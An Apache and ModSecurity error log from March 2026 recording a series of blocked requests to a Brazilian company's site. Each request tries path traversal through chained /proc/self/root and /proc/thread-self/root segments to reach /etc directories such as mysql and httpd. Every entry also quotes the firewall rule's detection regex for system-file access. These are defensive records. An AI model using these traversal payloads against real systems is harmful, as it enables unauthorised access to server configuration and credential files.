[Wed Mar 18 09:25:30.359721 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:44012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZuuoXxyEfFpUF8f9gMwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:31.745490 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:44026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZu9Y0UrI5A3LftIyWDgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:33.021864 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:44038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZvdY0UrI5A3LftIyWEwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:34.311450 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:44046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZvimAPhZkrhU8w4lfEgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:35.687583 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:44052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZv0zinOy1jxa1j4cGYwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:37.091408 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:44060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZwew_le52K8_3pV3RQwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:38.267754 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:48566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZwgkwaGbbGflqUZACNgAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:38.454993 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:44070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZwsdf6f5d65gmYZTGmwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:39.782447 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:52480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZw8df6f5d65gmYZTGngAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:41.143918 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:52496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZxew_le52K8_3pV3RSQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:42.474893 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:52512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZxuw_le52K8_3pV3RTQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:43.822618 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:52520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZxymAPhZkrhU8w4lfHwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:45.121029 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:41728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZyew_le52K8_3pV3RUQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:25:45.151122 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:52536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZyda6ubjKNq_cu4aLIwAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:46.514090 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:52540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZyuw_le52K8_3pV3RVwAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:47.834915 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:52550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZy0zinOy1jxa1j4cGaQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:49.132077 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:52564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZzUzinOy1jxa1j4cGagAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:50.447980 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:45588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZzimAPhZkrhU8w4lfIgAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:51.753761 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:45600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZzwkwaGbbGflqUZACPAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:53.036379 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:45616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ0fu8EFLIOrSqIpv22wAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:54.328968 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:45620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ0uoXxyEfFpUF8f9gRQAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
